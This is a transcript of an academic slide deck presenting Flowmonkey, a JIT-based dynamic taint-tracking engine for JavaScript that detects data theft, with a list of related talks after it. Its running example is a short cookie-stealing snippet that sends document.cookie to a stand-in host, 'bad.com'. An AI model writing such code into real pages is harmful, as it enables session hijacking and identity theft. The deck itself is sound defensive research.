Presentation is loading. Please wait.

Presentation is loading. Please wait.

document.cookie Identity Theft ✗ Cookie Stealing.

Published byOwen Butler Modified over 9 years ago

Similar presentations

Presentation on theme: "document.cookie Identity Theft ✗ Cookie Stealing."— Presentation transcript:

1

2

3 document.cookie Identity Theft ✗ Cookie Stealing

4 Password Credit card # Browsing history

5

6 Epidemic of Data Stealing JavaScript!

7 How to Detect Data Stealing? Without Sacrificing Performance?

8 Motivation Dynamic Taint Tracking Flowmonkey Future Work&Conclusion

9 Dynamic Taint Tracking Tracks where a value goes at runtime

10

11 Dynamic Taint Tracking 1. Tag a value with a taint 2. Propagate taints with the value 3. Block taints from untrusted sinks

12 Example:Cookie Stealing ck = document.cookie data = tmp + ck; send(“bad.com”, data);

13 Example:Cookie Stealing Inject Taints (At confidential sources) ck = document.cookie data = tmp + ck; send(“bad.com”, data ); document.cookie;

14 Example:Cookie Stealing Propagate Taints (At assignments, etc) ck = document.cookie; data = tmp + ck; send(“bad.com”, data ); ck ck;tmp + data

15 ck = document.cookie; data = tmp + ck; send(“bad.com”, data ); Example:Cookie Stealing Block Taints (At untrusted sinks) “cr=” + color send(“bad.com”, data );

16 Dynamic Taint Tracking:Policies Cookie Protection cookie send() Password Protection password send() ✗ ✗ General Policy secret info expression ✗

17 Dynamic Taint Tracking:JS Cross site scripting prevention with dynamic data tainting and static analysis, NDSS'07 Analyzing information flow in JavaScript-based browser extensions, ACSAC'09 An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications, CCS'10 10~100x slowdown

18 Goal: Make It Fast

19 Motivation Dynamic Taint Tracking Flowmonkey Future Work&Conclusion

20 InterpreterJIT Engine Source code Based on Jaegermonkey Modification M Taint tracking logic is augmented

21 Language Extensions __taint(val, t) val: a value to be tainted t : a taint to be used

22 Language Extensions __taintof(val) returns the taint of val

23 Language Extensions var secret = __taint(34349, 1); tmp = secret * 68; tmp2 = tmp + “345”; tmp3 = parseInt(tmp2); alert(__taintof(tmp)); // 1 is printed

24 Implementation: Shadow Stack s * 6 push s //s=5 push 6 mul 5 6 30 6’s taint s’ taintJoined taint Real Stack Shadow Stack

25 Implementation: Shadow Property a.fld = secret a fld… fld‘s taint… Real Properties Shadow Properties

26 Hybrid Approach Full-fledged Taint Tracking Interpreter Taint Detecting JIT Engine

27 Hybrid Approach Full-fledged Taint Tracking Interpreter Taint Detecting JIT Engine If it doesn’t touch a taint

28 Hybrid Approach Full-fledged Taint Tracking Interpreter Taint Detecting JIT Engine Taint detected!! Do full-fledged taint tracking

29 Hybrid Approach Rapid prototyping Fast with few taints Slow with many taints

30 Performance: Baseline Sunspider cookie doesn’t flow to 3 rd party code

31 Performance: Cookie Tracking Sunspider cookie doesn’t flow to 3 rd party code

32 Demo

33 Motivation Dynamic Taint Tracking Flowmonkey Future Work&Conclusion

34 Future Work Missing Flows Implicit Flows, Timing Channel, etc Empirical Study To prove the usability of taint tracking

35 Conclusions A Fast Hybrid Taint Tracking Engine First JIT-enabled taint tracking engine Still Many Missing Parts Possible to make it a protection tool? Can we sacrifice some performance?

36 Resources http://firebird.ucsd.edu/flowmonkey

37 Thank you!

Download ppt "document.cookie Identity Theft ✗ Cookie Stealing."

Similar presentations

Analyzing Information Flow in JavaScript-based Browser Extensions Mohan Dhawan and Vinod Ganapathy Department of Computer Science Rutgers University 25.

Analyzing Information Flow in JavaScript-based Browser Extensions Mohan Dhawan and Vinod Ganapathy Department of Computer Science Rutgers University 25.
JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.

JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.
The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010.

The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010.
Code Injection Attacks on HTML5-based Mobile Apps: Characterization, Detection and Mitigation Xing Jin, Xunchao Hu, Kailiang Ying, Wenliang Du, Heng Yin,

Code Injection Attacks on HTML5-based Mobile Apps: Characterization, Detection and Mitigation Xing Jin, Xunchao Hu, Kailiang Ying, Wenliang Du, Heng Yin,
Compiler Optimized Dynamic Taint Analysis James Kasten Alex Crowell.

Compiler Optimized Dynamic Taint Analysis James Kasten Alex Crowell.
GATEKEEPER MOSTLY STATIC ENFORCEMENT OF SECURITY AND RELIABILITY PROPERTIES FOR JAVASCRIPT CODE Salvatore Guarnieri & Benjamin Livshits Presented by Michael.

GATEKEEPER MOSTLY STATIC ENFORCEMENT OF SECURITY AND RELIABILITY PROPERTIES FOR JAVASCRIPT CODE Salvatore Guarnieri & Benjamin Livshits Presented by Michael.
WEB BROWSER SECURITY By Robert Sellers Brian Bauer.

WEB BROWSER SECURITY By Robert Sellers Brian Bauer.
Analyzing Information Flow in JavaScript-based Browser Extensions Mohan Dhawan and Vinod Ganapathy Department of Computer Science Rutgers University.

Analyzing Information Flow in JavaScript-based Browser Extensions Mohan Dhawan and Vinod Ganapathy Department of Computer Science Rutgers University.
Dec 5, 2007University of Virginia1 Efficient Dynamic Tainting using Multiple Cores Yan Huang University of Virginia Dec. 5 2007.

Dec 5, 2007University of Virginia1 Efficient Dynamic Tainting using Multiple Cores Yan Huang University of Virginia Dec
By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)

By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)
Securing Interaction for Sites, Apps and Extensions in the Browser Brad Miller J. D. Tygar.

Securing Interaction for Sites, Apps and Extensions in the Browser Brad Miller J. D. Tygar.
IFC Inside: Retrofitting Languages with Dynamic Information Flow Control Stefan Heule, Deian Stefan, Edward Z. Yang, John C. Mitchell, Alejandro Russo.

IFC Inside: Retrofitting Languages with Dynamic Information Flow Control Stefan Heule, Deian Stefan, Edward Z. Yang, John C. Mitchell, Alejandro Russo.
ReferencesReferences DiscussionDiscussion Vulnerability Example: SQL injection Auditing Tool for Eclipse LAPSE: a Security Auditing Tool for Eclipse IntroductionIntroductionResultsResults.

ReferencesReferences DiscussionDiscussion Vulnerability Example: SQL injection Auditing Tool for Eclipse LAPSE: a Security Auditing Tool for Eclipse IntroductionIntroductionResultsResults.
1 Enforcing Confidentiality in Low-level Programs Andrew Myers Cornell University.

1 Enforcing Confidentiality in Low-level Programs Andrew Myers Cornell University.
HTML Recall that HTML is static in that it describes how a page is to be displayed, but it doesn’t provide for interaction or animation. A page created.

HTML Recall that HTML is static in that it describes how a page is to be displayed, but it doesn’t provide for interaction or animation. A page created.
1 Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Prateek Saxena UC Berkeley Yacin Nadji Illinois Institute Of Technology.

1 Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Prateek Saxena UC Berkeley Yacin Nadji Illinois Institute Of Technology.
Staged Information Flow for JavaScript Ravi Chugh, Jeff Meister, Ranjit Jhala, Sorin Lerner UC San Diego.

Staged Information Flow for JavaScript Ravi Chugh, Jeff Meister, Ranjit Jhala, Sorin Lerner UC San Diego.
XP Tutorial 9 New Perspectives on JavaScript, Comprehensive1 Working with Cookies Managing Data in a Web Site Using JavaScript Cookies.

XP Tutorial 9 New Perspectives on JavaScript, Comprehensive1 Working with Cookies Managing Data in a Web Site Using JavaScript Cookies.
1 RAKSHA: A FLEXIBLE ARCHITECTURE FOR SOFTWARE SECURITY Computer Systems Laboratory Stanford University Hari Kannan, Michael Dalton, Christos Kozyrakis.

1 RAKSHA: A FLEXIBLE ARCHITECTURE FOR SOFTWARE SECURITY Computer Systems Laboratory Stanford University Hari Kannan, Michael Dalton, Christos Kozyrakis.
Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.

Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.

Similar presentations

Ads by Google